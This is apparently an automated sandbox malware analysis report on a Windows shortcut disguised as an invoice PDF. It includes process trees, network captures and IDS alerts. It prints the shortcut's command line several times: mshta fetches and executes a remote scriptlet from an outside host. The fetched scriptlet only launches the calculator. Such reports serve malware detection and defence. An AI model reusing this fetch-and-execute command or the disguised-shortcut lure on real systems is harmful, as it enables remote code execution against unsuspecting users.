Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: userenv.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: profext.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.web.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: C:\Windows\System32\calc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: mshta.exe, 00000003.00000002.1374395683.000001C98467E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1372500137.000001C984679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1372815385.000001C98467D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1374715411.000001D187113000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta.exe javascript:a=GetObject('script:https://iblue.team/update.sct').Exec();close()Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe" Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Exploitation for Client Execution
1
DLL Side-Loading
11
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
11
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS13
System Information Discovery
Distributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
INVOICE-0098.pdf ... .lnk.lnk.d.lnk29%ReversingLabsWin32.Trojan.Nioc
INVOICE-0098.pdf ... .lnk.lnk.d.lnk100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://iblue.team/0%Avira URL Cloudsafe
https://iblue.team/update.sct0%Avira URL Cloudsafe
https://iblue.team/update.sctmib0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
iblue.team
43.250.142.7
truetrue
    unknown
    s-part-0035.t-0009.t-msedge.net
    13.107.246.63
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://iblue.team/update.scttrue
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://iblue.team/mshta.exe, 00000003.00000002.1374395683.000001C98467E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1372500137.000001C984679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1372815385.000001C98467D000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://iblue.team/update.sctmibmshta.exe, 00000003.00000002.1374395683.000001C98467E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1372500137.000001C984679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1372815385.000001C98467D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      43.250.142.7
      iblue.teamAustralia
      45638SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUtrue
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1578281
      Start date and time:2024-12-19 14:20:31 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 24s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:16
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:INVOICE-0098.pdf ... .lnk.lnk.d.lnk
      Detection:MAL
      Classification:mal84.expl.winLNK@7/3@1/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 1
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .lnk
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 23.218.208.109, 20.12.23.50
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target mshta.exe, PID 4220 because there are no executed function
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: INVOICE-0098.pdf ... .lnk.lnk.d.lnk
      No simulations
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      s-part-0035.t-0009.t-msedge.nethnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
      • 13.107.246.63
      CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
      • 13.107.246.63
      LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
      • 13.107.246.63
      H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
      • 13.107.246.63
      https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
      • 13.107.246.63
      https:/u8138501.ct.sendgrid.net/ls/click?upn=u001.I6qT8Dz69MhteW3705K6IU1LQ3g963Y3zRTsxDX4fVXYJ9RlDTttUZ-2F4W6jkAN-2BWeLmhXvVM33dZ8zdyDBxMHQ-3D-3D9QvK_A3EA-2BxZf4c3dsLaDejTByFLk41BCxE4Uo2OrX4mgE2MxlzcgK-2B0xybGuUTGyYJ5YjbiPC-2BiCJh5GAJwBubqkrvcCxWB69FtxO-2BVNGA0rN43JH8wByhnP3sbd4cxwRxIrAIlntQArpxTPdsHXXK7UbcIv5pqpXW-2FKGrctJVKLD8TvnmRv0E5Rim-2FIGs5oxbnurWR3Goko7UqMeLf2edTdmQ-3D-3DGet hashmaliciousUnknownBrowse
      • 13.107.246.63
      BJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
      • 13.107.246.63
      https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
      • 13.107.246.63
      http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUQlZDVFpDUkpSUUhUQzVRN0Q2MFNLQU1XTy4uGet hashmaliciousHTMLPhisherBrowse
      • 13.107.246.63
      contract_signed.pdfGet hashmaliciousUnknownBrowse
      • 13.107.246.63
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUalWUxZvrvU.exeGet hashmaliciousFormBookBrowse
      • 103.42.108.46
      https://tiotapas.com.auGet hashmaliciousUnknownBrowse
      • 110.232.143.44
      Shipping report#Cargo Handling.exeGet hashmaliciousFormBookBrowse
      • 103.42.108.46
      PO76389.exeGet hashmaliciousFormBookBrowse
      • 103.42.108.46
      SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
      • 103.42.108.46
      r3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
      • 103.42.108.46
      3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
      • 103.42.108.46
      New Purchase Order.exeGet hashmaliciousFormBookBrowse
      • 103.42.108.46
      Scan 00093847.exeGet hashmaliciousFormBookBrowse
      • 103.42.108.46
      firmware.sh4.elfGet hashmaliciousUnknownBrowse
      • 103.27.32.30
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      37f463bf4616ecd445d4a1937da06e19YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
      • 43.250.142.7
      F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
      • 43.250.142.7
      0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
      • 43.250.142.7
      tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
      • 43.250.142.7
      t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
      • 43.250.142.7
      Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
      • 43.250.142.7
      Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
      • 43.250.142.7
      main.exeGet hashmaliciousRHADAMANTHYSBrowse
      • 43.250.142.7
      deb.exeGet hashmaliciousRHADAMANTHYSBrowse
      • 43.250.142.7
      iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
      • 43.250.142.7
      No context
      Process:C:\Windows\System32\mshta.exe
      File Type:XML document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):378
      Entropy (8bit):5.305144776827245
      Encrypted:false
      SSDEEP:6:RlS0tu47z7QUd/kFSVJWS9+GGJ7v84swradlYOMiCG/X3rlNHGIn2yM1O9:Rlz9xd/omJWQ4k4swrKUWX3rXpn2yM1k
      MD5:80C3BB3EBE02B712A4937DBB3AFEB16B
      SHA1:4EA0340738F9E1B3E5FACA6DC9BA377C8C011DF5
      SHA-256:1A2B27F162B53678E1C01FE69EB80BBD94BE99C6CC56D38D7C4E538DA740CC9E
      SHA-512:7CDDA0A9CBE11F97B16F30B84BBEE52E6AF665AEAB433AB86F3ECA95F46682D55870E252B1FBE06C9890FED9691B9D99502474090B6CFC7BEB153A2479CF4D4B
      Malicious:true
      Reputation:low
      Preview:<?XML version="1.0"?>..<scriptlet>..<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>....<public>.. <method name="Exec"></method>..</public>....<script language="JScript">..<![CDATA[...function Exec().{....var r = new ActiveXObject("WScript.Shell").Run("calc.exe");...}.. ..</script>..</scriptlet>
      Process:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
      File Type:MS Windows registry file, NT/2000 or above
      Category:dropped
      Size (bytes):8192
      Entropy (8bit):0.7299023492322436
      Encrypted:false
      SSDEEP:24:1E44WxkOanOClDuUbwB7c7h/+wB77nSadnW/6ZPo:TJxByOW87c7b7D/
      MD5:CCD244E6165B0FD993CE4DFE068F9DCE
      SHA1:7BED9E34BAB54BFA931A47A41D6D69E78E955C91
      SHA-256:5924D3E0A444935F0F41A53A5A73C67C2B4E231E5BD58F9681AC3CED3D8467AB
      SHA-512:E03CDBC594F50582D87858042DD958CEC48C4BCD2E2CB236D5CFEB1B11EAC592AAB4F8A280D1A75B831BA680A694981D79BBE7256BB262020B44E56DF3E80784
      Malicious:false
      Reputation:low
      Preview:regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm.b...R..............................................................................................................................................................................................................................................................................................................................................M.k~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
      File Type:MS Windows registry file, NT/2000 or above
      Category:dropped
      Size (bytes):8192
      Entropy (8bit):0.7680292469967214
      Encrypted:false
      SSDEEP:24:6e44WxkOsb7nOClDuUbwB7c7h/+wB77nSadnW/6ZPo:IJxB6jOW87c7b7D/
      MD5:67AB95A7A70528020007E2EC2A3E0FA1
      SHA1:6D2233FF828035657B71661B61162D6E45161809
      SHA-256:5E1448EF4F63093D10A02769C7574A9B316C89332A94FDEB9F0C41E594F4508F
      SHA-512:6ED35D48D01DDFAB043959A8505E98404652B43CC750732E5FCDCAF4BCA943A0CF3EF10521F23EA68922A447A850CD7C0DA868CFB091F5EB0972029628AE5F58
      Malicious:false
      Reputation:low
      Preview:regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm.b...R..............................................................................................................................................................................................................................................................................................................................................J.k~HvLE.....................1\........ .1."........hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............vk......0...........VeryFirstLaunch.......6...R.................vk................y Mode....p...sk..x...x.......t.......H...X.............4.........?.......................
      File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=114, Archive, ctime=Thu Nov 16 04:20:16 2023, mtime=Sun Feb 25 00:00:53 2024, atime=Thu Nov 16 04:20:16 2023, length=289792, window=hide
      Entropy (8bit):3.4654402851607053
      TrID:
      • Windows Shortcut (20020/1) 100.00%
      File name:INVOICE-0098.pdf ... .lnk.lnk.d.lnk
      File size:2'244 bytes
      MD5:d7d7174b0248c6bc97fc7d9668a514a9
      SHA1:a0714a6ecbd2b5b4ca8cf58dd70463d8ae10029d
      SHA256:10f0a14d9fb497e9aed942fc9193811b5437bb4dbd606c3db0b69f2273ce601a
      SHA512:a981ef5ca56b15cad709f2ef4c67d07ab67c936f0cbc7675c1deb8cd1e75da5fa4bee1127dbf2aac1124e9802ea9d40adde7db3c4119cf8cb62f4e66308f9a3b
      SSDEEP:48:8mBVp8eaXaDNz3o/MIiXv3KaTx+8Yk9+:8mu+1rbvKn8YY
      TLSH:0141BE122BC95761C7B68D37A47BF2418D31B96AFC07DBAD4694428D1850708FC3AF2E
      File Content Preview:L..................F.@.. ....8..L...i....g......L....l..r...................5....P.O. .:i.....+00.../C:\...................V.1.....SX.;..Windows.@........OwHYX......GH....D...................W.i.n.d.o.w.s.....Z.1.....WX:,..System32..B........OwHYX.......S
      Icon Hash:60d48ab2dec971ad

      General

      Relative Path:
      Command Line Argument:/c "mshta.exe javascript:a=GetObject('script:https://iblue.team/update.sct').Exec();close()"
      Icon location:C:\Windows\System32\shell32.dll
      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
      2024-12-19T14:21:27.083953+01002024550ET MALWARE Likely Malicious Windows SCT Download MSXMLHTTP M11192.168.2.94971243.250.142.7443TCP
      2024-12-19T14:21:27.084485+01002024553ET MALWARE Likely Malicious Windows SCT Download MSXMLHTTP AX143.250.142.7443192.168.2.949712TCP
      2024-12-19T14:21:27.084485+01002819903ETPRO MALWARE App Whitelist Bypass Via Com Scriptlet Inbound143.250.142.7443192.168.2.949712TCP
      2024-12-19T14:21:27.084485+01002826637ETPRO MALWARE Squiblydoo Scriptlet Download143.250.142.7443192.168.2.949712TCP
      TimestampSource PortDest PortSource IPDest IP
      Dec 19, 2024 14:21:24.614531040 CET49712443192.168.2.943.250.142.7
      Dec 19, 2024 14:21:24.614579916 CET4434971243.250.142.7192.168.2.9
      Dec 19, 2024 14:21:24.614670038 CET49712443192.168.2.943.250.142.7
      Dec 19, 2024 14:21:24.670449972 CET49712443192.168.2.943.250.142.7
      Dec 19, 2024 14:21:24.670473099 CET4434971243.250.142.7192.168.2.9
      Dec 19, 2024 14:21:26.323359013 CET4434971243.250.142.7192.168.2.9
      Dec 19, 2024 14:21:26.323493004 CET49712443192.168.2.943.250.142.7
      Dec 19, 2024 14:21:26.377551079 CET49712443192.168.2.943.250.142.7
      Dec 19, 2024 14:21:26.377583027 CET4434971243.250.142.7192.168.2.9
      Dec 19, 2024 14:21:26.378607988 CET4434971243.250.142.7192.168.2.9
      Dec 19, 2024 14:21:26.380357027 CET49712443192.168.2.943.250.142.7
      Dec 19, 2024 14:21:26.382189989 CET49712443192.168.2.943.250.142.7
      Dec 19, 2024 14:21:26.427330971 CET4434971243.250.142.7192.168.2.9
      Dec 19, 2024 14:21:27.084038973 CET4434971243.250.142.7192.168.2.9
      Dec 19, 2024 14:21:27.084225893 CET4434971243.250.142.7192.168.2.9
      Dec 19, 2024 14:21:27.084332943 CET49712443192.168.2.943.250.142.7
      Dec 19, 2024 14:21:27.088217020 CET49712443192.168.2.943.250.142.7
      Dec 19, 2024 14:21:27.088251114 CET4434971243.250.142.7192.168.2.9
      TimestampSource PortDest PortSource IPDest IP
      Dec 19, 2024 14:21:23.968554974 CET5377953192.168.2.91.1.1.1
      Dec 19, 2024 14:21:24.539067030 CET53537791.1.1.1192.168.2.9
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Dec 19, 2024 14:21:23.968554974 CET192.168.2.91.1.1.10xc11bStandard query (0)iblue.teamA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Dec 19, 2024 14:21:20.576076984 CET1.1.1.1192.168.2.90xd417No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
      Dec 19, 2024 14:21:20.576076984 CET1.1.1.1192.168.2.90xd417No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
      Dec 19, 2024 14:21:24.539067030 CET1.1.1.1192.168.2.90xc11bNo error (0)iblue.team43.250.142.7A (IP address)IN (0x0001)false
      • iblue.team
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.94971243.250.142.74434220C:\Windows\System32\mshta.exe
      TimestampBytes transferredDirectionData
      2024-12-19 13:21:26 UTC300OUTGET /update.sct HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: iblue.team
      Connection: Keep-Alive
      2024-12-19 13:21:27 UTC401INHTTP/1.1 200 OK
      Connection: close
      content-type: application/octet-stream
      last-modified: Sun, 25 Feb 2024 01:04:39 GMT
      accept-ranges: bytes
      content-length: 378
      date: Thu, 19 Dec 2024 13:21:26 GMT
      server: LiteSpeed
      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      2024-12-19 13:21:27 UTC378INData Raw: 3c 3f 58 4d 4c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0d 0a 3c 73 63 72 69 70 74 6c 65 74 3e 0d 0a 3c 72 65 67 69 73 74 72 61 74 69 6f 6e 20 64 65 73 63 72 69 70 74 69 6f 6e 3d 22 44 65 73 63 22 20 70 72 6f 67 69 64 3d 22 50 72 6f 67 69 64 22 20 76 65 72 73 69 6f 6e 3d 22 30 22 20 63 6c 61 73 73 69 64 3d 22 7b 41 41 41 41 31 31 31 31 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 46 45 45 44 41 43 44 43 7d 22 3e 3c 2f 72 65 67 69 73 74 72 61 74 69 6f 6e 3e 0d 0a 0d 0a 3c 70 75 62 6c 69 63 3e 0d 0a 20 20 20 20 3c 6d 65 74 68 6f 64 20 6e 61 6d 65 3d 22 45 78 65 63 22 3e 3c 2f 6d 65 74 68 6f 64 3e 0d 0a 3c 2f 70 75 62 6c 69 63 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 3e 0d 0a 3c 21 5b
      Data Ascii: <?XML version="1.0"?><scriptlet><registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration><public> <method name="Exec"></method></public><script language="JScript"><![


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:08:21:21
      Start date:19/12/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:https://iblue.team/update.sct').Exec();close()"
      Imagebase:0x7ff6df690000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:2
      Start time:08:21:21
      Start date:19/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff70f010000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:3
      Start time:08:21:21
      Start date:19/12/2024
      Path:C:\Windows\System32\mshta.exe
      Wow64 process (32bit):false
      Commandline:mshta.exe javascript:a=GetObject('script:https://iblue.team/update.sct').Exec();close()
      Imagebase:0x7ff709700000
      File size:14'848 bytes
      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:5
      Start time:08:21:26
      Start date:19/12/2024
      Path:C:\Windows\System32\calc.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\calc.exe"
      Imagebase:0x7ff79d450000
      File size:27'648 bytes
      MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:6
      Start time:08:21:26
      Start date:19/12/2024
      Path:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
      Imagebase:0x7ff7dd730000
      File size:4'099'584 bytes
      MD5 hash:94675EB54AC5DAA11ACE736DBFA9E7A2
      Has elevated privileges:false
      Has administrator privileges:false
